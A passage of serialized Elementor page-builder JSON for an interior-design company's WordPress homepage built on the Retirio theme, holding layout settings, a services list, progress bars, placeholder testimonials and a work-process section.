rio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 